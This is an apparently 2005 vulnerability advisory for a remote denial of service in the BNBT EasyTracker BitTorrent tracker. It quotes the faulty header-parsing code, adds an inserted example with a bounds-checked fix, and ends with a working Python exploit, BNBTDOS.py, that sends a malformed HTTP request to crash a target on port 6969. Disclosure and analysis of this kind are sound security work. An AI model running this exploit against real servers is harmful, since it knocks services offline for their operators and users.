`
BNBT EasyTracker Remote Denial of Service Vulnerability
by Sowhat
Last Update:2005.08.30
http://secway.org/advisory/AD20050830.txt
Vendor:
http://bnbteasytracker.sourceforge.net/
Product Affected:
7.7r3.2004.10.27 and below
Overview:
BNBT was written by Trevor Hogan. BNBT is a complete port
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).
A Denial of Service vulnerability exists within BNBT which
allows for an attacker to cause the BNBT to stop responding.
Details:
A specially crafted HTTP request will cause the BNBT
server to stop responding.
Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, in the "// grab headers" section, and that it is
something like "1 - 2 = -1", similar to memcpy(-1)?
// grab headers
string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );
strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
while( 1 )
{
    string :: size_type iSplit = strTemp.find( ":" );
    string :: size_type iEnd = strTemp.find( "\r\n" );
    if( iSplit == string :: npos )
    {
        UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
        break;
    }
    string strKey = strTemp.substr( 0, iSplit );
    string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( "\r\n" ) );//Bug here ??
    rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
    strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );
    if( iEnd == string :: npos )
        break;
}
However, I am not quite sure about that, and it seems that
it is only a D.O.S, so I haven't looked deep into it.
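An added example (not from the advisory or from BNBT's source): it runs the quoted loop's offset arithmetic on the advisory's request string locally, next to a bounds-checked variant. `std::string::substr` throws `std::out_of_range` when its start position exceeds the string size. The function names are hypothetical, and whether this exception is what stops the tracker is an inference from the quoted snippet, which the advisory leaves open.

```cpp
#include <algorithm>
#include <iostream>
#include <map>
#include <stdexcept>
#include <string>
using Headers = std::map<std::string, std::string>;
// Text between the request line and the blank line (guards are added here).
std::string header_block(const std::string& buf) {
    size_t nl = buf.find("\r\n"), dnl = buf.find("\r\n\r\n");
    if (nl == std::string::npos || dnl == std::string::npos || dnl < nl + 2) return "";
    return buf.substr(nl + 2, dnl - nl - 2);
}

// Same offset arithmetic as the quoted loop, with no bounds checks.
Headers parse_unchecked(std::string tmp) {
    Headers h;
    while (true) {
        size_t split = tmp.find(":"), end = tmp.find("\r\n");
        if (split == std::string::npos) break;
        // substr throws std::out_of_range when split + 2 > tmp.size().
        h.insert({tmp.substr(0, split), tmp.substr(split + 2, end - split - 2)});
        tmp = tmp.substr(end + 2);
        if (end == std::string::npos) break;
    }
    return h;
}
bool throws_out_of_range(const std::string& block) {
    try { parse_unchecked(block); } catch (const std::out_of_range&) { return true; }
    return false;
}

// Bounds-checked variant: rejects a malformed line instead of throwing.
bool parse_checked(const std::string& block, Headers& out) {
    for (size_t pos = 0, end; pos < block.size(); pos = end + 2) {
        end = std::min(block.find("\r\n", pos), block.size());
        std::string line = block.substr(pos, end - pos);
        size_t split = line.find(':');
        if (split == std::string::npos || split == 0) return false;  // no header name
        size_t v = line.find_first_not_of(" \t", split + 1);
        out[line.substr(0, split)] = (v == std::string::npos) ? "" : line.substr(v);
    }
    return true;
}

int main() {
    std::string block = header_block("GET /index.htm HTTP/1.1\r\n:\r\n\r\n");  // constructed
    Headers h;
    std::cout << throws_out_of_range(block) << " " << parse_checked(block, h) << "\n";
}
```

For this input the header block is the single character `:`, so the value offset (2) lies past the end of a one-byte string; an uncaught `std::out_of_range` terminates a C++ process.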
Exploit:
# BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discovered and coded by Sowhat
# http://secway.org
# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/
import sys
import string
import socket
if (len(sys.argv) != 2):
    print "\nUsage: " + sys.argv[0] + " TargetIP\n"
    print "##################################################################"
    print "#                                                                #"
    print "#             BNBT EasyTracker Remote D.O.S Exploit              #"
    print "#               Bug discovered and coded by Sowhat               #"
    print "#                       http://secway.org                        #"
    print "##################################################################"
    sys.exit(0)
host = sys.argv[1]
port = 6969
payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)
WORKAROUND:
No WORKAROUND this time.
plz check the vendor's website for update
Maybe there will be a patch later (?)
Vendor Response:
2005.08.22 Vendor notified via Webform, no email found
2005.08.30 Vendor no response. Advisory Released
"Life is like a bug, Do you know how to exploit it ?"
`